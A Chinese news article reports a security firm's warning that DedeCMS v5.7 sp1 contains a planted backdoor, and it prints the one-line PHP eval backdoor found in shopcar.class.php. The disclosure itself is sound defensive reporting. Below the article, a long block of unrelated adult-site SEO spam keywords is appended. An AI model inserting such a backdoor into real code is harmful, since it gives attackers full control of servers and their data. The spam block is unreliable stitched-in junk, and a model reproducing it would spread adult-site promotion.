返回頂部
關閉軟件導航
位置:首頁 > 資訊 > 織夢新聞>織夢CMS系統現后門70萬網站資料恐不保

瑞星公司今日對外發布緊急警示:國內知名的PHP開源網站管理系統——織夢CMS(DedeCms)v5.7 sp1版本被發現植入后門,黑客可通過此后門直接獲得網站的控制權限,獲取存儲在服務器上的文件和數據庫。據CMS官方數據顯示,目前約有70萬網站使用該系統搭建,涉及企業、政府機關、媒體機構、行業及個人網站等。瑞星公司特此緊急提醒使用該系統的網站管理員,使用瑞星網站密碼安全檢測系統查找后門并及時進行封堵。

wangluo1.jpg  

  據專家介紹,織夢CMS(Dedecms) v5.7 sp1版本的中的shopcar.class.php文件被植入一句后門代碼“@eval(file_get_contents('php://input'));”。通過利用這個后門,黑客只需要構造簡單的數據包提交到服務器,就能夠獲取到該網站的WebShell,通過對服務器進一步滲透攻擊,進而獲取服務器的最高權限。

  

  織夢CMS系統現后門70萬網站資料恐不保

  

  ▲CMS中被植入的后門代碼

  

  在黑客攻陷網站后,便可以直接訪問服務器上的文件、數據庫等信息。目前我國有大量網站采用該系統,此后門或將導致大量用戶的信息泄露,造成極為嚴重的影響。

如果您覺得 織夢CMS系統現后門70萬網站資料恐不保 這篇文章對您有用,請分享給您的好友,謝謝
文章地址:http://www.brucezhang.com/article/dede/1066.html
解放雙手無盡可能,有問題添加天線貓微信
主站蜘蛛池模板: 国产成人精品免高潮在线观看| 成人欧美一区二区三区的电影| 久久成人午夜电影mp4| 四虎影视永久地址www成人 | 亚洲人成人77777网站| 色老头成人免费视频天天综合| 成人午夜福利视频镇东影视| 四虎成人精品在永久在线| 欧美成人午夜做受视频| 四虎国产欧美成人影院| 欧美成人三级一区二区在线观看| 国产精品成人久久久久久久| 91成人午夜在线精品| 亚洲色成人网站WWW永久| 日本成人免费在线视频| 91精品成人福利在线播放| 国产成人av大片大片在线播放| 成人毛片在线观看| 欧美成人看片一区二区三区| 四虎成人免费大片在线| 国产成人精品男人免费| 天堂成人在线观看| 成人18视频日本| 影音先锋成人资源| 成人五级毛片免费播放| 日韩精品成人一区二区三区| 精品成人AV一区二区三区| 中国国产成人精品久久| 色偷偷成人网免费视频男人的天堂 | 成人免费夜片在线观看| 久久精品国产成人| 亚洲国产成人精品女人久久久| 成人午夜福利视频镇东影视| 美国成人a免费毛片| www.国产成人| 欧美成人精品第一区二区三区| 久久久久成人精品无码| 久久久久99精品成人片直播| 亚洲AV无码成人专区| 久久久久亚洲av成人网| 免费看成人aa片无码视频吃奶|